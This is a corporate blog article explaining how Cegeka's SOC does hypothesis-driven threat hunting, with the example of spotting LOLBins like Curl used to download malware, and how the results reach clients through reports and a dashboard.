In a previous article, we covered threat intelligence: the collection and analysis of data to understand the threat actors that pose cybersecurity risks to your organization. On an operational level, this involves detecting threats by matching Indicators of Compromise (IoCs) and Tactics, Techniques, and Procedures (TTPs) with data sourced from SIEM (Security Information and Event Management) platforms and XDR products.
Configuring a fully automated system that strikes a fine balance between detection rate and false positives is a formidable challenge. For instance, it’s well known that certain malware is downloaded and installed on workstations using trusted, pre-installed system tools to spread malware (so-called LOLBins or Living Off The Land Binaries), like Curl or Certutil. However, given that these tools have many legitimate uses, such as in update mechanisms, detecting all downloads with these tools and flagging them for scrutiny by our SOC analysts would overload them with false positives.
That’s why, on a tactical level, the Cegeka Modern SOC also performs recurring threat hunting. A senior CSIRT analysts then manually examines relevant, advanced and/or novel TTPs to uncover hidden attacks. So, how does this process work at Cegeka?
Our CSIRT analysts closely follow cybersecurity trends and understand their clients’ risk profiles, including the relevant threat actors they may face. Threat modeling, the process of identifying potential attackers, their goals, and the techniques they might use to compromise systems, helps analysts prioritize which threats to focus on. For example, an analyst might notice a trend involving the use of LOLBins like Curl to download malware, or the rise of Eastern European ransomware groups. This modeling informs the hypotheses they explore during threat hunting.
Drawing on this threat intelligence, the CSIRT analyst formulates several hypotheses, such as “Eastern European ransomware groups may be downloading attacker tools onto compromised machines using LOLBins.” This hypothesis is then translated into specific threat hunts, such as “The use of Curl for downloading from servers without a fully qualified domain name.”
Each hunt is then converted into precise hunting queries for EDR (Endpoint Detection and Response), XDR (Extended Detection and Response), and SIEM (Security Information and Event Management) products. These queries are executed across the systems of all our clients. We also run queries on network monitoring tools, for instance, in relation to data transfers to servers without a fully qualified domain name.
Every hunt leads to one of three scenarios: we uncover something suspicious, we lack sufficient data, or we find no noteworthy results.
The results of our hunts provide insights that we compile into a report for our clients:
Our SOC clients can also access these insights via the Cegeka Security Observability dashboard. This allows them to assess their risks and make informed decisions to improve their security posture based on concrete data from our threat hunts. For example, if our reports indicate they lack certain data sources, they may choose to invest in deploying these data sources to get the full benefit of our threat hunts.
By actively performing threat hunting and combining it with threat intelligence, newsletters, and ongoing threat research, organizations gain the insights needed to uncover hidden attacks and respond effectively to the latest cyber threats. It is this proactive approach that helps stay one step ahead in an ever-evolving threat landscape.
Threat Hunting is a part of our Cegeka Modern SOC services by default. On one hand, it allows us to detect advanced techniques for which continuous monitoring rules would overload SOC analysts with false-positives, and on the other hand it truly is a compensating control for attacks that might have slipped through the mazes of the net, because they are so novel or advanced.